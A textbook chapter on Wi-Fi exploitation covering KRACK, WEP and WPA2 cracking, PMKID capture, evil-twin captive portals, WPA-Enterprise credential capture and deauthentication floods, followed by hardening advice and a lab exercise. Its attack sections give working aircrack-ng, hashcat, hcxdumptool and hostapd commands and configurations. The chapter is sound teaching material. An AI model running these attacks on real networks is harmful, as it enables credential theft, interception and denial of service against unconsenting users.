Wireless Network Exploitation
WiFi attacks, WPA/WPA2/WPA3 security, evil twin attacks, rogue access points, and wireless defense strategies
Chapter 8: Wireless Network Exploitation
The KRACK Attack
In October 2017, security researcher Mathy Vanhoef of KU Leuven (Belgium) published research that shook the wireless security world: KRACK (Key Reinstallation Attacks). This vulnerability affected virtually every WiFi device on the planet.
KRACK exploited a flaw in the WPA2 four-way handshake. By manipulating cryptographic handshake messages, an attacker could trick devices into reinstalling an already-in-use encryption key, resetting associated nonce values. This broke the mathematical assumptions underlying WPA2βs security, allowing attackers to decrypt packets and potentially inject malicious data.
The vulnerability was particularly severe on Linux and Android devices, where the key could be reset to all zerosβeffectively disabling encryption entirely. For months, billions of devices were vulnerable while vendors scrambled to release patches.
KRACK demonstrated that even well-designed security protocols can harbor implementation vulnerabilities. This chapter explores wireless network exploitationβfrom classic WEP attacks to modern WPA3 considerationsβand the techniques both attackers and defenders use.
Wireless Attack Surface
Wireless networks broadcast through physical space, making them inherently more accessible to attackers than wired networks.
Wireless Attack Surface
Wireless Attack Surface:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
PHYSICAL LAYER ATTACKS:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β’ RF Jamming/Interference β’ Deauthentication floods β
β β’ Signal interception β’ Beacon flooding β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
AUTHENTICATION ATTACKS:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β’ WEP cracking β’ WPA/WPA2 dictionary attacks β
β β’ WPA handshake capture β’ PMKID attacks β
β β’ 802.1X bypass β’ Evil twin attacks β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
POST-CONNECTION ATTACKS:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β’ ARP spoofing (same as wired) β’ MITM attacks β
β β’ Traffic interception β’ Captive portal bypass β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
MANAGEMENT FRAME ATTACKS:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β’ Deauthentication attacks β’ Disassociation attacks β
β β’ Rogue AP detection evasion β’ Hidden SSID discovery β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββMITRE ATT&CK Reference
Wireless attacks map to:
- T1557 - Adversary-in-the-Middle
- T1557.002 - ARP Cache Poisoning
- T1040 - Network Sniffing
- T1200 - Hardware Additions
- T1599 - Network Boundary Bridging
Wireless Reconnaissance
Passive Reconnaissance
Monitor wireless traffic without transmittingβcompletely undetectable.
# Enable monitor mode
sudo airmon-ng start wlan0
# Passive scanning with airodump-ng
sudo airodump-ng wlan0mon
# Output shows:
# BSSID PWR Beacons #Data CH ENC ESSID
# AA:BB:CC:DD:EE:FF -45 100 500 6 WPA2 CorpNetwork
# 11:22:33:44:55:66 -70 50 100 1 WPA2 GuestNet
# Capture to file
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0monActive Reconnaissance
Hidden SSID Discovery:
# Hidden networks show blank ESSID in airodump
# Wait for client probe request or force it
# Deauthenticate client to force reconnection
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# Client reconnects, reveals SSID in probe request
# Now visible in airodump-ng outputWireless Survey Information
| Discovery | Information Gained |
|---|---|
| BSSID | Access point MAC address |
| ESSID | Network name |
| Channel | Operating frequency |
| Encryption | WEP/WPA/WPA2/WPA3/Open |
| Cipher | TKIP/CCMP |
| Auth | PSK/Enterprise |
| Signal | Distance estimation |
| Clients | Connected devices |
| Vendor | AP manufacturer (from OUI) |
WEP Attacks (Legacy)
WEP Vulnerability Overview
WEP (Wired Equivalent Privacy) has fundamental cryptographic flaws making it trivially breakable.
WEP Vulnerabilities
WEP Vulnerabilities:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1. SHORT IV (24 bits):
- Only 16 million possible IVs
- High-traffic network reuses IVs within hours
- Same IV = related keystream
2. WEAK IV PROBLEM:
- Some IVs leak key information
- With enough weak IVs, key is recoverable
3. NO REPLAY PROTECTION:
- Can replay captured packets
- Used to generate traffic for IV collection
4. CRC-32 INTEGRITY:
- Not cryptographic
- Can modify packets without detectionWEP Cracking (PTW Attack)
# Modern WEP cracking requires ~40,000 data packets
# Can be done in minutes on active network
# Step 1: Start capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
# Step 2: Generate traffic (ARP replay attack)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
# Step 3: Crack key (once enough IVs captured)
sudo aircrack-ng wep_capture-01.cap
# Output:
# KEY FOUND! [ 12:34:56:78:9A ]** WEP Is Obsolete**
WEP should never be used. If you encounter WEP in a security assessment, immediate remediation should be recommended. Modern attacks can crack WEP keys in under 5 minutes.
WPA/WPA2 PSK Attacks
Four-Way Handshake Capture
WPA/WPA2-PSK security depends on a pre-shared key. The handshake can be captured and subjected to offline dictionary attacks.
WPA2 FourWay Handshake
WPA2 Four-Way Handshake:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Client (STA) Access Point (AP)
β β
ββββββββββββββ Message 1: ANonce βββββββββββββββββ
β β
β Client derives PTK from: β
β - PSK (pre-shared key) β
β - ANonce (from AP) β
β - SNonce (generated) β
β - MAC addresses β
β β
ββββββββββββ Message 2: SNonce + MIC ββββββββββββΊβ
β β
β AP derives same PTK β
β Verifies MIC β
β β
ββββββββββββββ Message 3: GTK + MIC ββββββββββββββ
β β
ββββββββββββββββ Message 4: ACK βββββββββββββββββΊβ
β β
βββββββββββββ ENCRYPTED COMMUNICATION βββββββββββΊβ
ATTACK: Capture handshake, try PSK guesses offline
If guess produces valid MIC, PSK is crackedCapturing the Handshake
# Method 1: Wait for natural handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
# Wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message
# Method 2: Force handshake with deauth
# Terminal 1: Continue capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
# Terminal 2: Send deauth to force reconnection
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Client disconnects, reconnects, handshake captured!Cracking the Handshake
Using aircrack-ng:
# Dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
# If successful:
# KEY FOUND! [ SuperSecretPassword123 ]Using hashcat (GPU acceleration):
# Convert to hashcat format
aircrack-ng -j wpa_hash wpa_capture-01.cap
# Or use hcxpcapngtool
hcxpcapngtool -o hash.hc22000 wpa_capture-01.cap
# Run hashcat (WPA2 = mode 22000)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# GPU cracking is MUCH faster
# Modern GPU: millions of passwords/secondPMKID Attack (2018)
PMKID attack captures key material from a single packetβno client needed!
PMKID Attack
PMKID Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Traditional: Need handshake (requires client connection)
PMKID: Only need first frame from AP!
How it works:
AP includes optional PMKID in Message 1 (RSN IE)
PMKID = HMAC-SHA1(PMK, "PMK Name" || AP_MAC || STA_MAC)
Attack:
1. Send association request to AP
2. AP responds with Message 1 containing PMKID
3. Crack PMKID offline (same as handshake cracking)
Benefits:
- No client needed (can attack idle networks)
- Faster capture (single frame)
- Works against WPA2-PSK networks with roaming supportPMKID Capture:
# Using hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=3
# Or with targeted approach
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Convert and crack
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txtEvil Twin Attacks
Attack Overview
Create a fake access point impersonating a legitimate network to capture credentials or conduct MITM attacks.
Evil Twin Attack
Evil Twin Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SETUP:
Legitimate AP (AA:BB:CC:DD:EE:FF)
SSID: "CorpWiFi"
Channel 6
β
β
Victim ββββββββββββββββββββββ€
Device β
β
Evil Twin AP (same SSID)
"CorpWiFi" (stronger signal)
Channel 1 (or same)
Under attacker control
ATTACK FLOW:
1. Create AP with same SSID
2. Optionally deauth clients from legitimate AP
3. Victims connect to stronger/closer evil twin
4. Attacker controls all traffic
CREDENTIAL CAPTURE:
- Captive portal requesting WPA password
- Fake corporate login page
- MITM on all trafficEvil Twin with Captive Portal
# Using hostapd-wpe or eaphammer
# Create hostapd config
cat > evil_twin.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=CorpWiFi
hw_mode=g
channel=6
wmm_enabled=0
auth_algs=1
wpa=0
EOF
# Start AP
sudo hostapd evil_twin.conf
# Set up DHCP
sudo dnsmasq -i wlan0 --dhcp-range=192.168.1.2,192.168.1.254,255.255.255.0,12h
# Redirect to captive portal
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
# Run credential capture web server
python captive_portal.pyUsing Fluxion (Automated):
# Fluxion automates evil twin + captive portal attacks
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
./fluxion.sh
# Interactive menu:
# 1. Select target network
# 2. Capture handshake
# 3. Create evil twin with captive portal
# 4. Deauth original clients
# 5. Capture entered passwords
# 6. Verify against handshakeWPA Enterprise Attacks
PEAP/EAP-TTLS Attack
Capture and crack enterprise credentials using rogue RADIUS server.
WPAEnterprise Attack
WPA-Enterprise Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
LEGITIMATE FLOW:
Client βββΊ AP βββΊ RADIUS Server
(validates certificate)
(authenticates user)
ATTACK FLOW:
Client βββΊ Evil Twin AP βββΊ Rogue RADIUS
(self-signed cert)
(captures credentials)
If client doesn't validate certificate:
- Username captured
- Password/hash captured (MSCHAPv2)Using hostapd-wpe:
# hostapd-wpe patches hostapd for credential capture
# Configure for enterprise attack
cat > eap_user << 'EOF'
* PEAP,TTLS
"t" MSCHAPV2 "t" [2]
EOF
# Run hostapd-wpe
sudo hostapd-wpe hostapd-wpe.conf
# Captured credentials appear in hostapd-wpe.log
# MSCHAPv2 hashes can be cracked with hashcat
hashcat -m 5500 captured_hash.txt wordlist.txtCertificate Validation Bypass
Many enterprise clients donβt properly validate RADIUS certificates.
Certificate Issues
Certificate Issues:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WEAK CONFIGURATIONS:
- "Don't validate certificate" checked
- Certificate pinning disabled
- Any certificate accepted
ATTACK:
Evil twin presents self-signed certificate
Victim accepts (no validation)
Credentials captured
DEFENSE:
- Enforce certificate validation
- Pin specific CA
- Use device certificates (EAP-TLS)Deauthentication Attacks
Overview
802.11 management frames are unauthenticated, allowing attackers to forge deauthentication frames.
Deauthentication Attack
Deauthentication Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Attacker sends spoofed deauth frame:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Frame Control: Deauthentication β
β Destination: Client MAC (or broadcast) β
β Source: AP MAC (SPOOFED) β
β BSSID: AP MAC β
β Reason: "Inactivity" or similar β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Client receives, thinks AP sent it
Client disconnects immediately
Uses:
- Force handshake capture
- DoS against wireless network
- Drive clients to evil twinDeauth Flood
# Deauth single client
sudo aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 = deauth attack
# 10 = number of deauths
# Deauth all clients (broadcast)
sudo aireplay-ng -0 0 -a AP_MAC wlan0mon
# 0 = continuous
# Using mdk4 for more sophisticated attacks
sudo mdk4 wlan0mon d -c 6 # Deauth on channel 6Protected Management Frames (802.11w)
802.11w (PMF) cryptographically protects management frames, preventing spoofed deauth.
802.11w Protection
802.11w Protection:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WITHOUT 802.11w:
Deauth frames: Unauthenticated, easily spoofed
WITH 802.11w:
Deauth frames: Signed with session key
Attacker can't forge valid management frames
Adoption:
- Required for WPA3
- Optional for WPA2
- Must be enabled on both AP and clientWPA3 Security Improvements
WPA3 Features
WPA3 Security Enhancements
WPA3 Security Enhancements:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1. SAE (Simultaneous Authentication of Equals):
- Replaces PSK handshake
- Resistant to offline dictionary attacks
- Forward secrecy (past traffic safe if key compromised later)
2. PROTECTED MANAGEMENT FRAMES (Required):
- Mandatory 802.11w
- Prevents deauth attacks
3. 192-BIT SECURITY MODE (WPA3-Enterprise):
- Stronger cryptographic algorithms
- Meets CNS/NSA requirements
4. EASY CONNECT (DPP):
- QR code based provisioning
- Replaces WPSDragonblood Vulnerabilities (April 2019)
In April 2019, security researchers Mathy Vanhoef (KRACK discoverer) and Eyal Ronen published βDragonblood,β revealing that WPA3βs SAE (Dragonfly) handshake had implementation vulnerabilities:
Dragonblood Attacks
Dragonblood Attacks:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SIDE-CHANNEL ATTACKS:
- Timing leaks during SAE handshake
- Cache-based attacks
- Allowed password partitioning attacks
DOWNGRADE ATTACKS:
- Force WPA3 client to use WPA2 mode
- Then attack with traditional methods
STATUS:
- Vulnerabilities patched in implementations
- WPA3 still more secure than WPA2
- Ensure devices have latest updates
Researchers: Mathy Vanhoef (New York University Abu Dhabi) and
Eyal Ronen (Tel Aviv University & KU Leuven)Wireless Defense Strategies
Access Point Hardening
AP Security Checklist
AP Security Checklist:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ENCRYPTION:
β‘ Use WPA3 (or WPA2 minimum)
β‘ Use AES-CCMP (not TKIP)
β‘ Strong PSK (15+ characters, random)
β‘ Enable PMF (802.11w)
AUTHENTICATION:
β‘ WPA-Enterprise for corporate networks
β‘ Proper certificate configuration
β‘ Certificate validation enforced on clients
β‘ EAP-TLS where possible
ACCESS CONTROL:
β‘ MAC filtering (supplement, not primary)
β‘ Client isolation enabled
β‘ Separate guest network
β‘ VLAN segmentation
MONITORING:
β‘ Rogue AP detection enabled
β‘ Wireless IDS/IPS
β‘ Log authentication events
β‘ Monitor for deauth floodsClient Security
# Remove saved networks for untrusted locations
# Disable auto-connect
# Validate certificates for enterprise WiFi
# Windows - Forget network
netsh wlan delete profile name="NetworkName"
# Linux - Remove saved connection
nmcli connection delete "NetworkName"
# macOS - Remove from keychain
# System Preferences β Network β WiFi β Advanced β RemoveWireless IDS/IPS
| Tool | Description |
|---|---|
| Kismet | Wireless network detector, sniffer, IDS |
| Waidps | Wireless intrusion detection |
| OpenWIPS-ng | Open source wireless IPS |
| Cisco WLC | Enterprise WIPS (commercial) |
| Aruba/HPE | Enterprise wireless security |
# Kismet setup for detection
kismet -c wlan0mon
# Detects:
# - Rogue APs
# - Deauth floods
# - Evil twins
# - MAC spoofingLab Exercise: Wireless Attack Analysis
Objective
Understand wireless attacks in a controlled lab environment.
Environment
Lab Setup
Lab Setup:
βββ Attacker: Kali Linux with compatible wireless adapter
βββ Access Point: Your test AP (NOT production networks!)
βββ Client: Test device (laptop, phone)
βββ IMPORTANT: Isolated lab network only!Exercise 1: Reconnaissance
# Enable monitor mode
sudo airmon-ng start wlan0
# Scan for networks
sudo airodump-ng wlan0mon
# Identify:
# - Network names
# - Encryption types
# - Channels
# - Connected clients
# Stop when done
sudo airmon-ng stop wlan0monExercise 2: Handshake Capture (Your Own Network)
# On YOUR test network only
sudo airodump-ng -c YOUR_CHANNEL --bssid YOUR_AP_MAC -w test wlan0mon
# Disconnect your test client
# Watch for handshake capture
# Verify capture
aircrack-ng test-01.cap
# Should show "1 handshake"Exercise 3: Understanding Deauthentication
# Capture management frames
sudo tcpdump -i wlan0mon -w deauth.pcap 'subtype deauth'
# Analyze in Wireshark
# Observe:
# - Frame structure
# - Reason codes
# - Source/destinationKey Takeaways
-
WEP is brokenβnever use it, recommend immediate remediation
-
WPA2-PSK can be cracked if password is weakβuse 15+ character random passwords
-
PMKID attack doesnβt require clientβcapture from single AP frame
-
Evil twin attacks impersonate legitimate networksβverify certificate on enterprise networks
-
802.11w (PMF) prevents deauth attacksβenable on all devices supporting it
-
WPA3 provides significant security improvementsβdeploy when available
Self-Assessment
-
Comprehension: Why does the PMKID attack not require a connected client?
-
Application: A client is reporting their password was stolen even though they use WPA2-Enterprise. How might this have happened?
-
What if: Youβre asked to assess a WiFi network using WPA2-PSK with a 20-character password. Whatβs your attack strategy?
Review Questions
- Why is WEP fundamentally broken and unrepairable?
- Explain the four-way handshake and where the vulnerability lies.
- How does the PMKID attack differ from traditional handshake capture?
- What is an evil twin attack, and how does it capture credentials?
- How does 802.11w protect against deauthentication attacks?
- What security improvements does WPA3 provide over WPA2?
MITRE ATT&CK Mapping
| Attack | Technique ID | Tactic |
|---|---|---|
| WPA Cracking | T1040 | Credential Access |
| Evil Twin | T1557 | Credential Access |
| Deauthentication | T1499.002 | Impact |
| Rogue AP | T1200 | Initial Access |
| Credential Capture | T1110 | Credential Access |